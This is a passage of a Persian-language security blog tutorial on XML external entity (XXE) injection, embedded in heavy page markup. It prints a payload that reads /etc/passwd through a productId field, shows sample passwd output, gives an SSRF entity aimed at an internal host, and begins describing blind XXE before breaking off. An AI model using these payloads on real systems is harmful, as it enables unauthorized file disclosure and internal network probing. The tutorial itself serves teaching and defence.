dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>&lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;UTF-8&#8243;?&gt; <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &#8220;file:\/\/\/etc\/passwd&#8221;&gt; ]&gt; <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&lt;stockCheck&gt;&lt;productId&gt;&amp;xxe;&lt;\/productId&gt;&lt;\/stockCheck&gt;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4f6ffdc elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4f6ffdc\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f7a5420\" data-id=\"f7a5420\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c41bc6f elementor-widget elementor-widget-text-editor\" data-id=\"c41bc6f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u0627\u06cc\u0646 \u067e\u06cc\u200c\u0644\u0648\u062f XXE \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u0627\u06a9\u0633\u062a\u0631\u0646\u0627\u0644 \u0628\u0647 \u0646\u0627\u0645 xxe \u0627\u06cc\u062c\u0627\u062f \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0645\u0642\u062f\u0627\u0631 \u0622\u0646\u060c \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd \u0627\u0633\u062a\u060c \u0648 \u0633\u067e\u0633 \u0627\u0632 \u0627\u06cc\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc\u060c \u062f\u0631 \u0645\u0642\u062f\u0627\u0631 productID \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u067e\u0627\u0633\u062e \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646\u060c \u0634\u0627\u0645\u0644 \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \u0628\u0627\u0634\u062f:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e1dbc28 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e1dbc28\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5f6ed40\" data-id=\"5f6ed40\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-316dc31 elementor-widget elementor-widget-text-editor\" data-id=\"316dc31\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>Invalid product ID: root:x:0:0:root:\/root:\/bin\/bash <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-b4d5e1d elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"b4d5e1d\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c502b91\" data-id=\"c502b91\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-9392a5c elementor-widget elementor-widget-text-editor\" data-id=\"9392a5c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><strong>\u0646\u06a9\u062a\u0647:<\/strong> \u062f\u0631 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0648\u0627\u0642\u0639\u06cc XXE\u060c \u0645\u0639\u0645\u0648\u0644\u0627 \u062f\u0631 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 XML \u062b\u0628\u062a\u200c\u0634\u062f\u0647\u060c \u062a\u0639\u062f\u0627\u062f \u0632\u06cc\u0627\u062f\u06cc \u0645\u0642\u0627\u062f\u06cc\u0631 \u062f\u0627\u062f\u0647 \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u0646\u062f\u060c \u06a9\u0647 \u0647\u0631 \u06a9\u062f\u0627\u0645 \u0627\u0632 \u0622\u0646\u200c\u0647\u0627 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u062f\u0631 \u067e\u0627\u0633\u062e \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0628\u0647 \u06a9\u0627\u0631 \u0631\u0648\u0646\u062f. \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0647 \u0628\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0647 \u0635\u0648\u0631\u062a \u0633\u06cc\u0633\u062a\u0645\u0627\u062a\u06cc\u06a9 \u0648 \u0628\u0627 \u06cc\u06a9 \u0631\u0648\u06cc\u0647\u200c\u06cc \u0642\u0627\u0628\u0644 \u0627\u0639\u062a\u0645\u0627\u062f \u0648\u062c\u0648\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc XXE \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0646\u06cc\u062f\u060c \u0645\u0639\u0645\u0648\u0644\u0627 \u0646\u06cc\u0627\u0632 \u0627\u0633\u062a \u062a\u06a9\u200c\u062a\u06a9 Data Node\u0647\u0627\u060c \u06cc\u0639\u0646\u06cc \u0647\u0645\u0647\u200c\u06cc \u062c\u0627\u0647\u0627\u06cc\u06cc \u0631\u0627 \u06a9\u0647 \u062f\u0631 \u0641\u0627\u06cc\u0644 XML \u062f\u0627\u062f\u0647\u200c\u200c\u0627\u06cc \u0622\u0645\u062f\u0647 \u0627\u0633\u062a\u060c \u0628\u0647 \u0637\u0648\u0631 \u062c\u062f\u0627\u06af\u0627\u0646\u0647 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0646\u06cc\u062f. \u0628\u0631\u0627\u06cc \u0628\u0631\u0631\u0633\u06cc \u0647\u0645 \u0628\u0627\u06cc\u062f \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u062f \u0648 \u0622\u0646 \u0631\u0627 \u062c\u0627\u06cc \u062f\u0627\u062f\u0647\u200c\u06cc \u0645\u0648\u0631\u062f \u0646\u0638\u0631 \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u062f \u0648 \u0628\u0628\u06cc\u0646\u06cc\u062f \u0645\u0642\u062f\u0627\u0631 \u0622\u0646 \u062f\u0631 \u067e\u0627\u0633\u062e \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0628\u0627\u0632\u06af\u0631\u062f\u0627\u0646\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06cc\u0627 \u062e\u06cc\u0631. <\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-90eef78 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"90eef78\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2e1bbc5\" data-id=\"2e1bbc5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-126d655 elementor-widget elementor-widget-text-editor\" data-id=\"126d655\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"ssrf\"><span style=\"font-size: 12pt;\">\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a XXE \u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0647 SSRF\u00a0<\/span><\/h3>\n\u062c\u062f\u0627 \u0627\u0632 \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633\u060c \u06cc\u06a9\u06cc \u0627\u0632 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u0627\u0635\u0644\u06cc \u062d\u0645\u0644\u0627\u062a XXE \u0627\u06cc\u0646 \u0627\u0633\u062a \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u0622\u0646\u200c\u0647\u0627 \u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 <a href=\"https:\/\/liangroup.net\/blog\/%d8%aa%d8%b4%d8%b1%db%8c%d8%ad-%d8%a2%d8%b3%db%8c%d8%a8-%d9%be%d8%b0%db%8c%d8%b1%db%8c-ssrf\/\"><strong>\u062d\u0645\u0644\u0627\u062a SSRF<\/strong><\/a> (\u062a\u0648\u0644\u06cc\u062f \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a\u200c\u0647\u0627\u06cc \u062c\u0639\u0644\u06cc \u0633\u0645\u062a \u0633\u0631\u0648\u0631) \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f. \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u067e\u062a\u0627\u0646\u0633\u06cc\u0644 \u0627\u06cc\u0646 \u0631\u0627 \u062f\u0627\u0631\u062f \u06a9\u0647 \u0628\u0647\u200c\u0634\u062f\u062a \u062c\u062f\u06cc \u0648 \u062e\u0637\u0631\u0646\u0627\u06a9 \u0628\u0627\u0634\u062f\u060c \u0632\u06cc\u0631\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0622\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u06a9\u0627\u0631\u06cc \u06a9\u0631\u062f \u06a9\u0647 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0633\u0645\u062a \u0633\u0631\u0648\u0631\u060c \u0628\u0647 \u0647\u0631 \u0622\u062f\u0631\u0633 URL \u06a9\u0647 \u0633\u0631\u0648\u0631 \u0642\u0627\u062f\u0631 \u0628\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0622\u0646 \u0628\u0627\u0634\u062f\u060c \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a\u200c\u0647\u0627\u06cc HTTP \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u062f.\n\u0628\u0631\u0627\u06cc \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u062c\u0647\u062a \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0647\u200c\u06cc SSRF\u060c \u0628\u0627\u06cc\u062f \u062f\u0631 \u0641\u0627\u06cc\u0644 XML \u06cc\u06a9 external entity \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u062f \u0648 \u0645\u0642\u062f\u0627\u0631 \u0622\u0646 \u0631\u0627 \u0647\u0645\u0627\u0646 URL \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u062f \u06a9\u0647 \u0642\u0635\u062f \u0647\u062f\u0641\u200c\u0642\u0631\u0627\u0631\u062f\u0627\u062f\u0646 \u0622\u0646 \u0631\u0627 \u062f\u0627\u0631\u06cc\u062f\u060c \u0648 \u062f\u0631 \u0646\u0647\u0627\u06cc\u062a \u062f\u0631 \u0645\u06cc\u0627\u0646 \u062f\u0627\u062f\u0647\u200c\u0647\u0627 \u0627\u0632 \u0622\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f. \u0627\u06af\u0631 \u0628\u062a\u0648\u0627\u0646\u06cc\u062f \u0627\u0632 \u0627\u0646\u062a\u06cc\u062a\u06cc \u06a9\u0647 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0631\u062f\u0647\u200c\u0627\u06cc\u062f \u062f\u0631 \u062f\u0627\u062e\u0644 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u062f\u0631 \u067e\u0627\u0633\u062e \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0628\u0627\u0632\u06af\u0631\u062f\u0627\u0646\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u067e\u0627\u0633\u062e URL \u0645\u062f \u0646\u0638\u0631\u062a\u0627\u0646 \u0631\u0627 \u062f\u0627\u062e\u0644 \u067e\u0627\u0633\u062e \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0628\u0628\u06cc\u0646\u06cc\u062f\u060c \u0648 \u0627\u06cc\u0646 \u06af\u0648\u0646\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0627 \u06cc\u06a9 \u0648\u0627\u0633\u0637\u0647 (\u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646) \u0628\u0627 \u0633\u06cc\u0633\u062a\u0645 \u0628\u06a9\u200c\u0627\u0646\u062f \u0647\u062f\u0641 \u06cc\u06a9 \u0627\u0631\u062a\u0628\u0627\u0637 \u062f\u0648\u0637\u0631\u0641\u0647 \u0628\u0631\u0642\u0631\u0627\u0631 \u06a9\u0646\u06cc\u062f. \u062f\u0631 \u063a\u06cc\u0631 \u0627\u06cc\u0646 \u0635\u0648\u0631\u062a \u0641\u0642\u0637 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u062d\u0645\u0644\u0627\u062a Blind SSRF \u0631\u0627 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u062f (\u06a9\u0647 \u0627\u0644\u0628\u062a\u0647 \u0622\u0646\u200c\u0647\u0627 \u0647\u0645 \u0628\u0647 \u062c\u0627\u06cc \u062e\u0648\u062f \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0639\u0648\u0627\u0642\u0628 \u0628\u0633\u06cc\u0627\u0631 \u062e\u0637\u0631\u0646\u0627\u06a9\u06cc \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u0646\u062f).\n\n\u062f\u0631 \u0645\u062b\u0627\u0644 XXE \u0632\u06cc\u0631\u060c \u06cc\u06a9 External Entity \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u0633\u0631\u0648\u0631 \u06cc\u06a9 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a HTTP \u0628\u06a9\u200c\u0627\u0646\u062f \u0628\u0647 \u06cc\u06a9 \u0633\u06cc\u0633\u062a\u0645 \u062f\u0627\u062e\u0644\u06cc \u062f\u0631 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0633\u0627\u0632\u0645\u0627\u0646 \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u062f:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-eaf4d8a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"eaf4d8a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-854bda1\" data-id=\"854bda1\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6779da1 elementor-widget elementor-widget-text-editor\" data-id=\"6779da1\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &#8220;http:\/\/internal.vulnerable-website.com\/&#8221;&gt; ]&gt;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9214e71 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9214e71\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1c1f084\" data-id=\"1c1f084\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1cb188d elementor-widget elementor-widget-text-editor\" data-id=\"1cb188d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"blind-xxe\"><a href=\"#blind-xxe\"><span style=\"font-size: 12pt;\">\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc Blind XXE\u00a0<\/span><\/a><\/h3><p>\u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 \u0646\u0645\u0648\u0646\u0647\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE\u060c \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc Blind \u06cc\u0627 \u06a9\u0648\u0631 \u0647\u0633\u062a\u0646\u062f. \u0627\u06cc\u0646 \u0627\u0635\u0637\u0644\u0627\u062d \u0628\u0647 \u0627\u06cc\u0646 \u0645\u0639\u0646\u06cc \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u0627\u06cc\u0646 \u0646\u0648\u0639 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0645\u0642\u0627\u062f\u06cc\u0631 \u0647\u06cc\u0686\u200c\u06a9\u062f\u0627\u0645 \u0627\u0632 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc \u062a\u0639\u0631\u06cc\u0641\u200c\u0634\u062f\u0647 \u0631\u0627 \u062f\u0631 \u067e\u0627\u0633\u062e \u062e\u0648\u062f \u0628\u0627\u0632\u0646\u0645\u06cc\u200c\u06af\u0631\u062f\u0627\u0646\u062f\u060c \u0648 \u0628\u0647 \u0647\u0645\u06cc\u0646 \u062e\u0627\u0637\u0631 \u0627\u0645\u06a9\u0627\u0646 \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0645\u0633\u062a\u0642\u06cc\u0645 \u0628\u0647 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u0633\u0645\u062a \u0633\u0631\u0648\u0631 \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0631\u062f.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-18916da elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"18916da\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-f8b2382\" data-id=\"f8b2382\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-9bc1922 elementor-widget elementor-widget-text-editor\" data-id=\"9bc1922\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u0627\u0644\u0628\u062a\u0647 \u0647\u0645\u200c\u0686\u0646\u0627\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc Blind XXE \u0631\u0627 \u06cc\u0627\u0641\u062a \u0648 \u0622\u0646\u200c\u0647\u0627 \u0631\u0627 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u06a9\u0631\u062f\u060c \u0648\u0644\u06cc \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0647 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc \u067e\u06cc\u0634\u0631\u0641\u062a\u0647\u200c\u062a\u0631\u06cc \u0646\u06cc\u0627\u0632 \u0627\u0633\u062a. \u0628\u0639\u0636\u06cc \u0627\u0648\u0642\u0627\u062a \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0631\u0627\u06cc \u06cc\u0627\u0641\u062a\u0646 \u0627\u06cc\u0646\u200c\u06af\u0648\u0646\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627 \u0648 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0622\u0646\u200c\u0647\u0627 \u062c\u0647\u062a \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u062f\u0627\u062f\u0647\u060c \u0627\u0632 \u0631\u0648\u0634\u200c\u0647\u0627\u06cc out-of-band \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f. \u0648 \u0628\u0639\u0636\u06cc \u0627\u0648\u0642\u0627\u062a \u0646\u06cc\u0632 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f Parsing Error \u06cc\u0627 \u062e\u0637\u0627\u0647\u0627\u06cc \u062a\u062c\u0632\u06cc\u0647\u200c\u0627\u06cc \u0631\u0627 \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u062f\u0631 \u0645\u062a\u0646 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627\u060c \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u0631\u0627 \u0641\u0627\u0634 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-71bcd52\" data-id=\"71bcd52\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-846fccd elementor-widget elementor-widget-image\" data-id=\"846fccd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/blind-xxe-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail wp-image-11108\" alt=\"blind xxe\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/blind-xxe-150x150.jpg 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/blind-xxe-300x300.jpg 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/blind-xxe.jpg 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-7e4a29e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"7e4a29e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b5f1dba\" data-id=\"b5f1dba\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c2f1d01 elementor-widget elementor-widget-text-editor\" data-id=\"c2f1d01\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"whats-blind-xxe\">\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc Blind XXE \u0686\u06cc\u0633\u062a\u061f<\/h3>\n\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc Blind XXE \u06cc\u0627 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u06a9\u0648\u0631\u060c \u0632\u0645\u0627\u0646\u06cc \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f \u06a9\u0647 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0646\u0633\u0628\u062a \u0628\u0647 XXE Injection \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0627\u0633\u062a\u060c \u0648\u0644\u06cc \u0645\u0642\u062f\u0627\u0631 \u0647\u06cc\u0686 External Entity \u062a\u0639\u0631\u06cc\u0641\u200c\u0634\u062f\u0647\u200c\u0627\u06cc \u0631\u0627 \u062f\u0631 \u067e\u0627\u0633\u062e\u200c\u0647\u0627\u06cc \u062e\u0648\u062f \u0646\u0645\u06cc\u200c\u0622\u0648\u0631\u062f. \u0627\u06cc\u0646 \u0628\u0647 \u0622\u0646 \u0645\u0639\u0646\u0627\u0633\u062a \u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0645\u0633\u062a\u0642\u06cc\u0645 \u0628\u0647 